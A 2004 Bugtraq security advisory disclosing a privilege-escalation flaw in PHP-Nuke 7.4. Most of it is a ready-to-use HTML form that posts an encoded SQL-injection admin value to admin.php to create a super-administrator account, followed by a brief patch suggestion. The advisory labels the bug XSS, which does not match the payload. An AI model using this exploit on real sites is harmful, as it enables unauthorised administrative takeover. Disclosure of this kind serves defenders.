Bugtraq mailing list archives
[XSS] PHP-Nuke 7.4 Remote Privilege Escalation
From: Pierquinto Manco <mantra () ntj it>
Date: 3 Sep 2004 12:50:59 -0000
************************************************************** * CODEBUG Labs * Advisory #1 * Title: AddAdmin Bug * Author: Pierquinto 'Mantra' Manco * Product: PHP-Nuke 7.4 * Type: XSS * Web: http://www.mantralab.org [ITALIAN SITE] * ************************************************************** Remote Privilege Escalation - ) Description PHP-Nuke is a very bugged web CMS, version 7.4 has critical XSS bug that permit to an attacker to gain Admin access to the system. The bug is very old but we can bypass the patch sending data by POST instead of GET. - ) Proof-of-Concept Create a HTML file with this lines: <form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php"> <p>USERNAME: <input type="text" name="add_aid"> <br> NOME: <input type="text" name="add_name"> <br> PASSWORD: <input type="text" name="add_pwd"> <br> E-MAIL: <input type="text" name="add_email"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="AddAuthor"> </p> <p> <input type="submit" name="Submit" value="Create Admin"> <br> </p> </form> - ) Patch Put in admin.php a routine to check GET and POST global array. (maybe COOKIE too) ************************************************************** http://www.mantralab.org admin () mantralab org **************************************************************
Current thread:
- [XSS] PHP-Nuke 7.4 Remote Privilege Escalation Pierquinto Manco (Sep 03)